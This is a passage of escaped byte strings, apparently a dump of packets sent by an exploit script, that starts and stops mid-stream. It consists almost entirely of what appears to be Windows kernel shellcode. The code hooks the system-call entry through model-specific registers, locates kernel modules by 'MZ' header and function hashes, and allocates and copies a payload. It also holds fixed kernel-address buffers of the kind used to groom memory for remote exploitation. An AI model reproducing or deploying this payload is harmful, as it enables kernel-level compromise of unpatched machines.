\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 8, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\